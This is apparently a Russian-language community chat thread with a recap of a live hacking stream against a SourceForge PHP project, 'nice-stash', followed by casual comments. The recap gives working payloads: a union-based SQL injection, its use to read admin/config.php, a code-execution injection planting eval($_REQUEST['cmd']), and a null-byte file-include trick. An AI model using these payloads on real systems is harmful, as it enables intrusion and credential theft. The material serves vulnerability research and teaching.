А еще бы интересно посмотреть аудит новых версий php , mysql
интересно unserialize() phpmyadmin

Вот я помню мучался с %00 в php 7.0 а он пофикшен еще в 5.2

я начал изучать пхп вот только на 7 версии.

Сделаем

Знакомый нашел в одной мейл-рушной игрушке багу с unserialize()
и 3к $ получил.

Друзья, ниже небольшая выжимка из стрима!

❗️❕❗️Стрим доступен по той же ссылке. Запись осталась

После эфира было много комментариев по поводу ведения стрима, каюсь, я только учусь.
В следующий раз постараюсь составить какой-то предварительный план и меньше отвлекаться на чат и донаты.
Возможно придется делать каждые минут 20 остановки на чат.

Итак, к багам

Тезисно по стриму:
- Ломали
https://sourceforge.net/projects/nice-stash/files/

Нашли:
1. union based SQLi
File: /downloadmp3.php
Payload:
?download=3'+union+select+1,2,3,4,5,6--+
Вывод в имени аттача
Эту же sqli можно использовать в качестве читалки файлов:
Payload:
?download=3'+union+select+1,2,3,4,5,'../../admin/config.php'--+

2. RCE
File: /admin/info.php
Payload:
&datetype=US'; if(isset($_REQUEST['cmd']))eval($_REQUEST['cmd']);echo'

3. Бага с читалкой файлов, по поводу которой был холивар в чате:

if(isset($_GET['template'])) {  
  $templatedata = openTemplates("template/".$_GET['template'].".tpl.html");
}

Если установлена версия php, где не пофиксили null-byte, можно обрезать суффикс с помощью %00

Ссылки нашего комьюнити ниже:
http://no.offence.site/yt - YouTube
http://no.offence.site/group - Telegram group
http://no.offence.site/channel - Telegram channel

Спасибо, что вы поддерживаете меня просмотрами, лайками, комментариями.
Я буду делать стримы качественнее от раза к разу, и буду рад вас видеть!

До скорого!

Хороший материал 👍

скинь мне тоже почитать =)

Красивое число 😈

еще чуток и тыща

777 пропустил(

Фотошоп!!!1

@Franky_T Тааань, они все таки лайки только ценят:(

Лайки не главное)

Очень даже согласна)